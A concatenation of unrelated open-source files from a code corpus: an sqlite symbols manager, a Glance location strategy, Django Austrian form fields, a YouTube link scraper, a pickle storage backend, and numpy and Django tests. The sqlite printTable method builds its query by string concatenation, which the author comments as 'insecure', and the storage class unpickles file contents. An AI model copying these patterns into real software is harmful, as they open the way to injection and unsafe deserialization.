# -*- coding: utf-8 -*- """ Created on Fri Dec 09 18:41:08 2011 @author: jev """ import sqlite3 as db #import sys, os class Symbols(object): ''' class for managing a group of spreads through sqlite ''' def __init__(self,fName='spreads.db'): self.con = db.connect(fName) self.cur = self.con.cursor() def sql(self,query): cur = self.con.cursor() cur.execute(query) return cur.fetchall() def initDb(self): self.cur.execute("DROP TABLE IF EXISTS tbl_symbols") self.cur.execute("""CREATE TABLE tbl_symbols ( id INTEGER PRIMARY KEY AUTOINCREMENT, symbol TEXT, secType TEXT DEFAULT 'STK', currency TEXT DEFAULT 'USD', exchange TEXT DEFAULT 'SMART', active BOOLEAN DEFAULT 1)""") self.con.commit() def addSymbol(self, symbol): t = (symbol,) self.cur.execute("INSERT INTO tbl_symbols (symbol) VALUES(?) ",t) def printTable(self,table): q = "SELECT * FROM "+table # insecure, but ? does not work here self.cur.execute(q) print '-'*10+table+"-"*10 for row in self.cur: print row def _testFcn(self): self.sql("insert into tbl_symbols ") def showTables(self): self.cur.execute("select name from sqlite_master where type='table' ") res = self.cur.fetchall() for row in res: print row[0] def __del__(self): self.con.close() if __name__=='__main__': g = Symbols() g.initDb() g.showTables() g.addSymbol('SPY') g.addSymbol('XYZ') g.printTable('tbl_symbols')
bsd-3-clause
sigmavirus24/glance
glance/common/location_strategy/location_order.py
18
1079
# Copyright 2014 IBM Corp. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Image location order based location strategy module""" def get_strategy_name(): """Return strategy module name.""" return 'location_order' def init(): """Initialize strategy module.""" pass def get_ordered_locations(locations, **kwargs): """ Order image location list. :param locations: The original image location list. :return: The image location list with original natural order. """ return locations
apache-2.0
CubicERP/geraldo
site/newsite/django_1_0/django/contrib/localflavor/at/forms.py
71
2271
""" AT-specific Form helpers """ import re from django.utils.translation import ugettext_lazy as _ from django.forms.fields import Field, RegexField, Select from django.forms import ValidationError re_ssn = re.compile(r'^\d{4} \d{6}') class ATZipCodeField(RegexField): """ A form field that validates its input is an Austrian postcode. Accepts 4 digits. """ default_error_messages = { 'invalid': _('Enter a zip code in the format XXXX.'), } def __init__(self, *args, **kwargs): super(ATZipCodeField, self).__init__(r'^\d{4}$', max_length=None, min_length=None, *args, **kwargs) class ATStateSelect(Select): """ A Select widget that uses a list of AT states as its choices. """ def __init__(self, attrs=None): from django.contrib.localflavor.at.at_states import STATE_CHOICES super(ATStateSelect, self).__init__(attrs, choices=STATE_CHOICES) class ATSocialSecurityNumberField(Field): """ Austrian Social Security numbers are composed of a 4 digits and 6 digits field. The latter represents in most cases the person's birthdate while the first 4 digits represent a 3-digits counter and a one-digit checksum. The 6-digits field can also differ from the person's birthdate if the 3-digits counter suffered an overflow. This code is based on information available on http://de.wikipedia.org/wiki/Sozialversicherungsnummer#.C3.96sterreich """ default_error_messages = { 'invalid': _(u'Enter a valid Austrian Social Security Number in XXXX XXXXXX format.'), } def clean(self, value): if not re_ssn.search(value): raise ValidationError(self.error_messages['invalid']) sqnr, date = value.split(" ") sqnr, check = (sqnr[:3], (sqnr[3])) if int(sqnr) < 100: raise ValidationError(self.error_messages['invalid']) res = int(sqnr[0])*3 + int(sqnr[1])*7 + int(sqnr[2])*9 \ + int(date[0])*5 + int(date[1])*8 + int(date[2])*4 \ + int(date[3])*2 + int(date[4])*1 + int(date[5])*6 res = res % 11 if res != int(check): raise ValidationError(self.error_messages['invalid']) return u'%s%s %s'%(sqnr, check, date,)
lgpl-3.0
dentaku65/plugin.video.italyalacarta
servers/youtube.py
40
12842
# s-*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # Conector para Youtube # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urlparse,urllib2,urllib,re,httplib from core import config from core import logger from core import scrapertools from core.item import Item import cgi try: import simplejson as json except ImportError: import json def get_video_url( page_url , premium = False , user="" , password="", video_password="" ): logger.info("[youtube.py] get_video_url(page_url='%s')" % page_url) video_urls = [] #page_url = "http://www.youtube.com/get_video_info?&video_id=zlZgGlwBgro" if not page_url.startswith("http"): page_url = "http://www.youtube.com/watch?v=%s" % page_url logger.info("[youtube.py] page_url->'%s'" % page_url) # Lee la página del video data = scrapertools.cache_page( page_url , headers=[['User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3']] , ) ''' data = scrapertools.get_match(data,"yt.playerConfig \= (.*?)yt.setConfig") data = data.replace("\\","") logger.info("-------------------------------------------------------------------------------------------") logger.info("data="+data) logger.info("-------------------------------------------------------------------------------------------") # "fmt_list": "37/1920x1080/9/0/115,22/1280x720/9/0/115,84/1280x720/9/0/115,35/854x480/9/0/115,34/640x360/9/0/115,18/640x360/9/0/115,82/640x360/9/0/115,5/320x240/7/0/0,36/320x240/99/0/0,17/176x144/99/0/0" fmt_list = urllib.unquote( scrapertools.get_match(data,'"fmt_list"\: "([^"]+)"') ) logger.info(fmt_list) fmt_list_array = fmt_list.split(",") # "url_encoded_fmt_stream_map": # "fallback_host=tc.v15.cache6.c.youtube.com\u0026sig=6CB93CBC67CF3B593A6C5193A40246D43879EC12.3EC65E221B0113A8EAA63F0A059F91A24C0ABEF9\u0026itag=37\u0026url=http%3A%2F%2Fr6---sn-h5q7enel.c.youtube.com%2Fvideoplayback%3Fkey%3Dyt1%26ip%3D80.26.225.23%26sver%3D3%26expire%3D1358232284%26itag%3D37%26fexp%3D920704%252C912806%252C922403%252C922405%252C929901%252C913605%252C925710%252C929104%252C929110%252C908493%252C920201%252C913302%252C919009%252C911116%252C910221%252C901451%26source%3Dyoutube%26mv%3Dm%26newshard%3Dyes%26ms%3Dau%26upn%3DKJ4LhwFLl7g%26ratebypass%3Dyes%26id%3D9cbfb0c3e5c7b5a6%26mt%3D1358208854%26sparams%3Dcp%252Cgcr%252Cid%252Cip%252Cipbits%252Citag%252Cratebypass%252Csource%252Cupn%252Cexpire%26gcr%3Des%26ipbits%3D8%26cp%3DU0hUTVJOUF9NTkNONF9KSFRDOkJnNE9EUGNUeWtj\u0026quality=hd1080\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.64001F%2C+mp4a.40.2%22 # ,fallback_host= fmt_stream_map = urllib.unquote( scrapertools.get_match(data,'"url_encoded_fmt_stream_map"\: "([^"]+)"') ) logger.info(fmt_stream_map) fmt_stream_map_array = fmt_stream_map.split(",") logger.info("-------------------------------------------------------------------------------------------") logger.info("len(fmt_list_array)=%d" % len(fmt_list_array)) logger.info("len(fmt_stream_map_array)=%d" % len(fmt_stream_map_array)) CALIDADES = {'5':'240p','34':'360p','18':'360p','35':'480p','22':'720p','84':'720p','37':'1080p','38':'3072p','17':'144p','43':'360p','44':'480p','45':'720p'} for i in range(len(fmt_list_array)): try: video_url = urllib.unquote(fmt_stream_map_array[i]) logger.info("video_url="+video_url) video_url = urllib.unquote(video_url[4:]) video_url = video_url.split(";")[0] logger.info(" [%s] - %s" % (fmt_list_array[i],video_url)) calidad = fmt_list_array[i].split("/")[0] video_url = video_url.replace("flv&itag="+calidad,"flv") video_url = video_url.replace("="+calidad+"&url=","") video_url = video_url.replace("sig=","signature=") video_url = re.sub("^=http","http",video_url) resolucion = fmt_list_array[i].split("/")[1] formato = "" patron = '&type\=video/([a-z0-9\-]+)' matches = re.compile(patron,re.DOTALL).findall(video_url) if len(matches)>0: formato = matches[0] if formato.startswith("x-"): formato = formato[2:] formato = formato.upper() etiqueta = "" try: etiqueta = CALIDADES[calidad] if formato!="": etiqueta = etiqueta + " (%s a %s) [youtube]" % (formato,resolucion) else: etiqueta = etiqueta + " (%s) [youtube]" % (resolucion) video_urls.append( [ etiqueta , video_url ]) except: pass except: pass ''' video_urls = scrapeWebPageForVideoLinks(data) video_urls.reverse() for video_url in video_urls: logger.info(str(video_url)) return video_urls ''' def extractFlashVars(data): flashvars = {} #found = False patron = '<script>.*?ytplayer.config = (.*?);</script>' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) if matches: data = json.loads(matches[0]) flashvars = data["args"] #logger.info("flashvars: " + repr(flashvars)) return flashvars ''' def removeAdditionalEndingDelimiter(data): pos = data.find("};") if pos != -1: logger.info(u"found extra delimiter, removing") data = data[:pos + 1] return data def normalizeUrl(self, url): if url[0:2] == "//": url = "http:" + url return url def extractFlashVars(data): assets=0 flashvars = {} found = False for line in data.split("\n"): if line.strip().find(";ytplayer.config = ") > 0: found = True p1 = line.find(";ytplayer.config = ") + len(";ytplayer.config = ") - 1 p2 = line.rfind(";") if p1 <= 0 or p2 <= 0: continue data = line[p1 + 1:p2] break data = removeAdditionalEndingDelimiter(data) if found: data = json.loads(data) if assets: flashvars = data["assets"] else: flashvars = data["args"] for k in ["html", "css", "js"]: if k in flashvars: flashvars[k] = normalizeUrl(flashvars[k]) logger.info("Step2: " + repr(data)) logger.info(u"flashvars: " + repr(flashvars)) return flashvars def scrapeWebPageForVideoLinks(data): logger.info("") links = {} fmt_value = { 5: "240p h263 flv", 18: "360p h264 mp4", 22: "720p h264 mp4", 26: "???", 33: "???", 34: "360p h264 flv", 35: "480p h264 flv", 37: "1080p h264 mp4", 36: "3gpp", 38: "720p vp8 webm", 43: "360p h264 flv", 44: "480p vp8 webm", 45: "720p vp8 webm", 46: "520p vp8 webm", 59: "480 for rtmpe", 78: "400 for rtmpe", 82: "360p h264 stereo", 83: "240p h264 stereo", 84: "720p h264 stereo", 85: "520p h264 stereo", 100: "360p vp8 webm stereo", 101: "480p vp8 webm stereo", 102: "720p vp8 webm stereo", 120: "hd720", 121: "hd1080" } video_urls=[] flashvars = extractFlashVars(data) if not flashvars.has_key(u"url_encoded_fmt_stream_map"): return links if flashvars.has_key(u"ttsurl"): logger.info("ttsurl="+flashvars[u"ttsurl"]) for url_desc in flashvars[u"url_encoded_fmt_stream_map"].split(u","): url_desc_map = cgi.parse_qs(url_desc) logger.info(u"url_map: " + repr(url_desc_map)) if not (url_desc_map.has_key(u"url") or url_desc_map.has_key(u"stream")): continue try: key = int(url_desc_map[u"itag"][0]) url = u"" if url_desc_map.has_key(u"url"): url = urllib.unquote(url_desc_map[u"url"][0]) elif url_desc_map.has_key(u"conn") and url_desc_map.has_key(u"stream"): url = urllib.unquote(url_desc_map[u"conn"][0]) if url.rfind("/") < len(url) -1: url = url + "/" url = url + urllib.unquote(url_desc_map[u"stream"][0]) elif url_desc_map.has_key(u"stream") and not url_desc_map.has_key(u"conn"): url = urllib.unquote(url_desc_map[u"stream"][0]) if url_desc_map.has_key(u"sig"): url = url + u"&signature=" + url_desc_map[u"sig"][0] #links[key] = url video_urls.append( [ "("+fmt_value[key]+") [youtube]" , url ]) except: logger.info("ERROR EN "+str(url_desc)) return video_urls def find_videos(data): encontrados = set() devuelve = [] patronvideos = 'youtube(?:-nocookie)?\.com/(?:(?:(?:v/|embed/))|(?:(?:watch(?:_popup)?(?:\.php)?)?(?:\?|#!?)(?:.+&)?v=))?([0-9A-Za-z_-]{11})'#'"http://www.youtube.com/v/([^"]+)"' logger.info("[youtube.py] find_videos #"+patronvideos+"#") matches = re.compile(patronvideos,re.DOTALL).findall(data) for match in matches: titulo = "[YouTube]" url = "http://www.youtube.com/watch?v="+match if url!='': if url not in encontrados: logger.info(" url="+url) devuelve.append( [ titulo , url , 'youtube' ] ) encontrados.add(url) else: logger.info(" url duplicada="+url) patronvideos = 'www.youtube.*?v(?:=|%3D)([0-9A-Za-z_-]{11})' logger.info("[youtube.py] find_videos #"+patronvideos+"#") matches = re.compile(patronvideos,re.DOTALL).findall(data) for match in matches: titulo = "[YouTube]" url = "http://www.youtube.com/watch?v="+match if url not in encontrados: logger.info(" url="+url) devuelve.append( [ titulo , url , 'youtube' ] ) encontrados.add(url) else: logger.info(" url duplicada="+url) #http://www.youtube.com/v/AcbsMOMg2fQ patronvideos = 'youtube.com/v/([0-9A-Za-z_-]{11})' logger.info("[youtube.py] find_videos #"+patronvideos+"#") matches = re.compile(patronvideos,re.DOTALL).findall(data) for match in matches: titulo = "[YouTube]" url = "http://www.youtube.com/watch?v="+match if url not in encontrados: logger.info(" url="+url) devuelve.append( [ titulo , url , 'youtube' ] ) encontrados.add(url) else: logger.info(" url duplicada="+url) return devuelve def test(): video_urls = get_video_url("http://www.youtube.com/watch?v=Kk-435429-M") return len(video_urls)>0
gpl-3.0
CenterForOpenScience/modular-odm
modularodm/storage/picklestorage.py
4
7102
# -*- coding utf-8 -*- import os import copy import six from .base import Storage from ..query.queryset import BaseQuerySet from ..query.query import QueryGroup from ..query.query import RawQuery from modularodm.utils import DirtyField from modularodm.exceptions import ( KeyExistsException, MultipleResultsFound, NoResultsFound, ) try: import cpickle as pickle except ImportError: import pickle def _eq(data, test): if isinstance(data, list): return test in data return data == test operators = { 'eq': _eq, 'ne': lambda data, test: data != test, 'gt': lambda data, test: data > test, 'gte': lambda data, test: data >= test, 'lt': lambda data, test: data < test, 'lte': lambda data, test: data <= test, 'in': lambda data, test: data in test, 'nin': lambda data, test: data not in test, 'startswith': lambda data, test: data.startswith(test), 'endswith': lambda data, test: data.endswith(test), 'contains': lambda data, test: test in data, 'icontains': lambda data, test: test.lower() in data.lower(), } class PickleQuerySet(BaseQuerySet): _sort = DirtyField(None) _offset = DirtyField(None) _limit = DirtyField(None) def __init__(self, schema, data): super(PickleQuerySet, self).__init__(schema) self._data = list(data) self._dirty = True self.data = [] def _eval(self): if self._dirty: self.data = self._data[:] if self._sort is not None: for key in self._sort[::-1]: if key.startswith('-'): reverse = True key = key.lstrip('-') else: reverse = False self.data = sorted( self.data, key=lambda record: record[key], reverse=reverse ) if self._offset is not None: self.data = self.data[self._offset:] if self._limit is not None: self.data = self.data[:self._limit] self._dirty = False return self def _do_getitem(self, index, raw=False): self._eval() if isinstance(index, slice): return PickleQuerySet(self.schema, self.data[index]) key = self.data[index][self.primary] result = self.data[index] if raw: return result[self.primary] return self.schema.load(data=result) def __iter__(self, raw=False): self._eval() if raw: return [each[self.primary] for each in self.data] return (self.schema.load(data=each) for each in self.data) def __len__(self): self._eval() return len(self.data) count = __len__ def get_key(self, index): return self.__getitem__(index, raw=True) def get_keys(self): return list(self.__iter__(raw=True)) def sort(self, *keys): """ Iteratively sort data by keys in reverse order. """ self._sort = keys return self def offset(self, n): self._offset = n return self def limit(self, n): self._limit = n return self class PickleStorage(Storage): """ Storage backend using pickle. """ QuerySet = PickleQuerySet def __init__(self, collection_name, prefix='db_', ext='pkl'): """Build pickle file name and load data if exists. :param collection_name: Collection name :param prefix: File prefix. :param ext: File extension. """ # Build filename filename = collection_name + '.' + ext if prefix: self.filename = prefix + filename else: self.filename = filename # Initialize empty store self.store = {} # Load file if exists if os.path.exists(self.filename): with open(self.filename, 'rb') as fp: data = fp.read() self.store = pickle.loads(data) def _delete_file(self): try: os.remove(self.filename) except OSError: pass def insert(self, primary_name, key, value): if key not in self.store: self.store[key] = copy.deepcopy(value) self.flush() else: msg = 'Key ({key}) already exists'.format(key=key) raise KeyExistsException(msg) def update(self, query, data): data = copy.deepcopy(data) for pk in self.find(query, by_pk=True): for key, value in data.items(): self.store[pk][key] = value def get(self, primary_name, key): data = self.store.get(key) if data is not None: return copy.deepcopy(data) def _remove_by_pk(self, key, flush=True): """Retrieve value from store. :param key: Key """ try: del self.store[key] except Exception as error: pass if flush: self.flush() def remove(self, query=None): for key in self.find(query, by_pk=True): self._remove_by_pk(key, flush=False) self.flush() def flush(self): with open(self.filename, 'wb') as fp: pickle.dump(self.store, fp, -1) def find_one(self, query=None, **kwargs): results = list(self.find(query)) if len(results) == 1: return results[0] elif len(results) == 0: raise NoResultsFound() else: raise MultipleResultsFound( 'Query for find_one must return exactly one result; ' 'returned {0}'.format(len(results)) ) def _match(self, value, query): if isinstance(query, QueryGroup): matches = [self._match(value, node) for node in query.nodes] if query.operator == 'and': return all(matches) elif query.operator == 'or': return any(matches) elif query.operator == 'not': return not any(matches) else: raise ValueError('QueryGroup operator must be <and>, <or>, or <not>.') elif isinstance(query, RawQuery): attribute, operator, argument = \ query.attribute, query.operator, query.argument return operators[operator](value[attribute], argument) else: raise TypeError('Query must be a QueryGroup or Query object.') def find(self, query=None, **kwargs): if query is None: for key, value in six.iteritems(self.store): yield value else: # TODO: Making this a generator breaks it, since it can change for key, value in list(six.iteritems(self.store)): if self._match(value, query): if kwargs.get('by_pk'): yield key else: yield value
apache-2.0
victor-prado/broker-manager
environment/lib/python3.5/site-packages/numpy/lib/tests/test_shape_base.py
22
14660
from __future__ import division, absolute_import, print_function import numpy as np from numpy.lib.shape_base import ( apply_along_axis, apply_over_axes, array_split, split, hsplit, dsplit, vsplit, dstack, column_stack, kron, tile ) from numpy.testing import ( run_module_suite, TestCase, assert_, assert_equal, assert_array_equal, assert_raises, assert_warns ) class TestApplyAlongAxis(TestCase): def test_simple(self): a = np.ones((20, 10), 'd') assert_array_equal( apply_along_axis(len, 0, a), len(a)*np.ones(a.shape[1])) def test_simple101(self, level=11): a = np.ones((10, 101), 'd') assert_array_equal( apply_along_axis(len, 0, a), len(a)*np.ones(a.shape[1])) def test_3d(self): a = np.arange(27).reshape((3, 3, 3)) assert_array_equal(apply_along_axis(np.sum, 0, a), [[27, 30, 33], [36, 39, 42], [45, 48, 51]]) def test_preserve_subclass(self): def double(row): return row * 2 m = np.matrix([[0, 1], [2, 3]]) result = apply_along_axis(double, 0, m) assert isinstance(result, np.matrix) assert_array_equal( result, np.matrix([[0, 2], [4, 6]]) ) def test_subclass(self): class MinimalSubclass(np.ndarray): data = 1 def minimal_function(array): return array.data a = np.zeros((6, 3)).view(MinimalSubclass) assert_array_equal( apply_along_axis(minimal_function, 0, a), np.array([1, 1, 1]) ) def test_scalar_array(self): class MinimalSubclass(np.ndarray): pass a = np.ones((6, 3)).view(MinimalSubclass) res = apply_along_axis(np.sum, 0, a) assert isinstance(res, MinimalSubclass) assert_array_equal(res, np.array([6, 6, 6]).view(MinimalSubclass)) def test_tuple_func1d(self): def sample_1d(x): return x[1], x[0] res = np.apply_along_axis(sample_1d, 1, np.array([[1, 2], [3, 4]])) assert_array_equal(res, np.array([[2, 1], [4, 3]])) class TestApplyOverAxes(TestCase): def test_simple(self): a = np.arange(24).reshape(2, 3, 4) aoa_a = apply_over_axes(np.sum, a, [0, 2]) assert_array_equal(aoa_a, np.array([[[60], [92], [124]]])) class TestArraySplit(TestCase): def test_integer_0_split(self): a = np.arange(10) assert_raises(ValueError, array_split, a, 0) def test_integer_split(self): a = np.arange(10) res = array_split(a, 1) desired = [np.arange(10)] compare_results(res, desired) res = array_split(a, 2) desired = [np.arange(5), np.arange(5, 10)] compare_results(res, desired) res = array_split(a, 3) desired = [np.arange(4), np.arange(4, 7), np.arange(7, 10)] compare_results(res, desired) res = array_split(a, 4) desired = [np.arange(3), np.arange(3, 6), np.arange(6, 8), np.arange(8, 10)] compare_results(res, desired) res = array_split(a, 5) desired = [np.arange(2), np.arange(2, 4), np.arange(4, 6), np.arange(6, 8), np.arange(8, 10)] compare_results(res, desired) res = array_split(a, 6) desired = [np.arange(2), np.arange(2, 4), np.arange(4, 6), np.arange(6, 8), np.arange(8, 9), np.arange(9, 10)] compare_results(res, desired) res = array_split(a, 7) desired = [np.arange(2), np.arange(2, 4), np.arange(4, 6), np.arange(6, 7), np.arange(7, 8), np.arange(8, 9), np.arange(9, 10)] compare_results(res, desired) res = array_split(a, 8) desired = [np.arange(2), np.arange(2, 4), np.arange(4, 5), np.arange(5, 6), np.arange(6, 7), np.arange(7, 8), np.arange(8, 9), np.arange(9, 10)] compare_results(res, desired) res = array_split(a, 9) desired = [np.arange(2), np.arange(2, 3), np.arange(3, 4), np.arange(4, 5), np.arange(5, 6), np.arange(6, 7), np.arange(7, 8), np.arange(8, 9), np.arange(9, 10)] compare_results(res, desired) res = array_split(a, 10) desired = [np.arange(1), np.arange(1, 2), np.arange(2, 3), np.arange(3, 4), np.arange(4, 5), np.arange(5, 6), np.arange(6, 7), np.arange(7, 8), np.arange(8, 9), np.arange(9, 10)] compare_results(res, desired) res = array_split(a, 11) desired = [np.arange(1), np.arange(1, 2), np.arange(2, 3), np.arange(3, 4), np.arange(4, 5), np.arange(5, 6), np.arange(6, 7), np.arange(7, 8), np.arange(8, 9), np.arange(9, 10), np.array([])] compare_results(res, desired) def test_integer_split_2D_rows(self): a = np.array([np.arange(10), np.arange(10)]) res = array_split(a, 3, axis=0) tgt = [np.array([np.arange(10)]), np.array([np.arange(10)]), np.zeros((0, 10))] compare_results(res, tgt) assert_(a.dtype.type is res[-1].dtype.type) # Same thing for manual splits: res = array_split(a, [0, 1, 2], axis=0) tgt = [np.zeros((0, 10)), np.array([np.arange(10)]), np.array([np.arange(10)])] compare_results(res, tgt) assert_(a.dtype.type is res[-1].dtype.type) def test_integer_split_2D_cols(self): a = np.array([np.arange(10), np.arange(10)]) res = array_split(a, 3, axis=-1) desired = [np.array([np.arange(4), np.arange(4)]), np.array([np.arange(4, 7), np.arange(4, 7)]), np.array([np.arange(7, 10), np.arange(7, 10)])] compare_results(res, desired) def test_integer_split_2D_default(self): """ This will fail if we change default axis """ a = np.array([np.arange(10), np.arange(10)]) res = array_split(a, 3) tgt = [np.array([np.arange(10)]), np.array([np.arange(10)]), np.zeros((0, 10))] compare_results(res, tgt) assert_(a.dtype.type is res[-1].dtype.type) # perhaps should check higher dimensions def test_index_split_simple(self): a = np.arange(10) indices = [1, 5, 7] res = array_split(a, indices, axis=-1) desired = [np.arange(0, 1), np.arange(1, 5), np.arange(5, 7), np.arange(7, 10)] compare_results(res, desired) def test_index_split_low_bound(self): a = np.arange(10) indices = [0, 5, 7] res = array_split(a, indices, axis=-1) desired = [np.array([]), np.arange(0, 5), np.arange(5, 7), np.arange(7, 10)] compare_results(res, desired) def test_index_split_high_bound(self): a = np.arange(10) indices = [0, 5, 7, 10, 12] res = array_split(a, indices, axis=-1) desired = [np.array([]), np.arange(0, 5), np.arange(5, 7), np.arange(7, 10), np.array([]), np.array([])] compare_results(res, desired) class TestSplit(TestCase): # The split function is essentially the same as array_split, # except that it test if splitting will result in an # equal split. Only test for this case. def test_equal_split(self): a = np.arange(10) res = split(a, 2) desired = [np.arange(5), np.arange(5, 10)] compare_results(res, desired) def test_unequal_split(self): a = np.arange(10) assert_raises(ValueError, split, a, 3) class TestColumnStack(TestCase): def test_non_iterable(self): assert_raises(TypeError, column_stack, 1) class TestDstack(TestCase): def test_non_iterable(self): assert_raises(TypeError, dstack, 1) def test_0D_array(self): a = np.array(1) b = np.array(2) res = dstack([a, b]) desired = np.array([[[1, 2]]]) assert_array_equal(res, desired) def test_1D_array(self): a = np.array([1]) b = np.array([2]) res = dstack([a, b]) desired = np.array([[[1, 2]]]) assert_array_equal(res, desired) def test_2D_array(self): a = np.array([[1], [2]]) b = np.array([[1], [2]]) res = dstack([a, b]) desired = np.array([[[1, 1]], [[2, 2, ]]]) assert_array_equal(res, desired) def test_2D_array2(self): a = np.array([1, 2]) b = np.array([1, 2]) res = dstack([a, b]) desired = np.array([[[1, 1], [2, 2]]]) assert_array_equal(res, desired) # array_split has more comprehensive test of splitting. # only do simple test on hsplit, vsplit, and dsplit class TestHsplit(TestCase): """Only testing for integer splits. """ def test_non_iterable(self): assert_raises(ValueError, hsplit, 1, 1) def test_0D_array(self): a = np.array(1) try: hsplit(a, 2) assert_(0) except ValueError: pass def test_1D_array(self): a = np.array([1, 2, 3, 4]) res = hsplit(a, 2) desired = [np.array([1, 2]), np.array([3, 4])] compare_results(res, desired) def test_2D_array(self): a = np.array([[1, 2, 3, 4], [1, 2, 3, 4]]) res = hsplit(a, 2) desired = [np.array([[1, 2], [1, 2]]), np.array([[3, 4], [3, 4]])] compare_results(res, desired) class TestVsplit(TestCase): """Only testing for integer splits. """ def test_non_iterable(self): assert_raises(ValueError, vsplit, 1, 1) def test_0D_array(self): a = np.array(1) assert_raises(ValueError, vsplit, a, 2) def test_1D_array(self): a = np.array([1, 2, 3, 4]) try: vsplit(a, 2) assert_(0) except ValueError: pass def test_2D_array(self): a = np.array([[1, 2, 3, 4], [1, 2, 3, 4]]) res = vsplit(a, 2) desired = [np.array([[1, 2, 3, 4]]), np.array([[1, 2, 3, 4]])] compare_results(res, desired) class TestDsplit(TestCase): # Only testing for integer splits. def test_non_iterable(self): assert_raises(ValueError, dsplit, 1, 1) def test_0D_array(self): a = np.array(1) assert_raises(ValueError, dsplit, a, 2) def test_1D_array(self): a = np.array([1, 2, 3, 4]) assert_raises(ValueError, dsplit, a, 2) def test_2D_array(self): a = np.array([[1, 2, 3, 4], [1, 2, 3, 4]]) try: dsplit(a, 2) assert_(0) except ValueError: pass def test_3D_array(self): a = np.array([[[1, 2, 3, 4], [1, 2, 3, 4]], [[1, 2, 3, 4], [1, 2, 3, 4]]]) res = dsplit(a, 2) desired = [np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]]), np.array([[[3, 4], [3, 4]], [[3, 4], [3, 4]]])] compare_results(res, desired) class TestSqueeze(TestCase): def test_basic(self): from numpy.random import rand a = rand(20, 10, 10, 1, 1) b = rand(20, 1, 10, 1, 20) c = rand(1, 1, 20, 10) assert_array_equal(np.squeeze(a), np.reshape(a, (20, 10, 10))) assert_array_equal(np.squeeze(b), np.reshape(b, (20, 10, 20))) assert_array_equal(np.squeeze(c), np.reshape(c, (20, 10))) # Squeezing to 0-dim should still give an ndarray a = [[[1.5]]] res = np.squeeze(a) assert_equal(res, 1.5) assert_equal(res.ndim, 0) assert_equal(type(res), np.ndarray) class TestKron(TestCase): def test_return_type(self): a = np.ones([2, 2]) m = np.asmatrix(a) assert_equal(type(kron(a, a)), np.ndarray) assert_equal(type(kron(m, m)), np.matrix) assert_equal(type(kron(a, m)), np.matrix) assert_equal(type(kron(m, a)), np.matrix) class myarray(np.ndarray): __array_priority__ = 0.0 ma = myarray(a.shape, a.dtype, a.data) assert_equal(type(kron(a, a)), np.ndarray) assert_equal(type(kron(ma, ma)), myarray) assert_equal(type(kron(a, ma)), np.ndarray) assert_equal(type(kron(ma, a)), myarray) class TestTile(TestCase): def test_basic(self): a = np.array([0, 1, 2]) b = [[1, 2], [3, 4]] assert_equal(tile(a, 2), [0, 1, 2, 0, 1, 2]) assert_equal(tile(a, (2, 2)), [[0, 1, 2, 0, 1, 2], [0, 1, 2, 0, 1, 2]]) assert_equal(tile(a, (1, 2)), [[0, 1, 2, 0, 1, 2]]) assert_equal(tile(b, 2), [[1, 2, 1, 2], [3, 4, 3, 4]]) assert_equal(tile(b, (2, 1)), [[1, 2], [3, 4], [1, 2], [3, 4]]) assert_equal(tile(b, (2, 2)), [[1, 2, 1, 2], [3, 4, 3, 4], [1, 2, 1, 2], [3, 4, 3, 4]]) def test_tile_one_repetition_on_array_gh4679(self): a = np.arange(5) b = tile(a, 1) b += 2 assert_equal(a, np.arange(5)) def test_empty(self): a = np.array([[[]]]) b = np.array([[], []]) c = tile(b, 2).shape d = tile(a, (3, 2, 5)).shape assert_equal(c, (2, 0)) assert_equal(d, (3, 2, 0)) def test_kroncompare(self): from numpy.random import randint reps = [(2,), (1, 2), (2, 1), (2, 2), (2, 3, 2), (3, 2)] shape = [(3,), (2, 3), (3, 4, 3), (3, 2, 3), (4, 3, 2, 4), (2, 2)] for s in shape: b = randint(0, 10, size=s) for r in reps: a = np.ones(r, b.dtype) large = tile(b, r) klarge = kron(a, b) assert_equal(large, klarge) class TestMayShareMemory(TestCase): def test_basic(self): d = np.ones((50, 60)) d2 = np.ones((30, 60, 6)) self.assertTrue(np.may_share_memory(d, d)) self.assertTrue(np.may_share_memory(d, d[::-1])) self.assertTrue(np.may_share_memory(d, d[::2])) self.assertTrue(np.may_share_memory(d, d[1:, ::-1])) self.assertFalse(np.may_share_memory(d[::-1], d2)) self.assertFalse(np.may_share_memory(d[::2], d2)) self.assertFalse(np.may_share_memory(d[1:, ::-1], d2)) self.assertTrue(np.may_share_memory(d2[1:, ::-1], d2)) # Utility def compare_results(res, desired): for i in range(len(desired)): assert_array_equal(res[i], desired[i]) if __name__ == "__main__": run_module_suite()
mit
wsmith323/django
tests/utils_tests/test_regex_helper.py
448
1784
from __future__ import unicode_literals import unittest from django.utils import regex_helper class NormalizeTests(unittest.TestCase): def test_empty(self): pattern = r"" expected = [('', [])] result = regex_helper.normalize(pattern) self.assertEqual(result, expected) def test_escape(self): pattern = r"\\\^\$\.\|\?\*\+\(\)\[" expected = [('\\^$.|?*+()[', [])] result = regex_helper.normalize(pattern) self.assertEqual(result, expected) def test_group_positional(self): pattern = r"(.*)-(.+)" expected = [('%(_0)s-%(_1)s', ['_0', '_1'])] result = regex_helper.normalize(pattern) self.assertEqual(result, expected) def test_group_ignored(self): pattern = r"(?i)(?L)(?m)(?s)(?u)(?#)" expected = [('', [])] result = regex_helper.normalize(pattern) self.assertEqual(result, expected) def test_group_noncapturing(self): pattern = r"(?:non-capturing)" expected = [('non-capturing', [])] result = regex_helper.normalize(pattern) self.assertEqual(result, expected) def test_group_named(self): pattern = r"(?P<first_group_name>.*)-(?P<second_group_name>.*)" expected = [('%(first_group_name)s-%(second_group_name)s', ['first_group_name', 'second_group_name'])] result = regex_helper.normalize(pattern) self.assertEqual(result, expected) def test_group_backreference(self): pattern = r"(?P<first_group_name>.*)-(?P=first_group_name)" expected = [('%(first_group_name)s-%(first_group_name)s', ['first_group_name'])] result = regex_helper.normalize(pattern) self.assertEqual(result, expected)
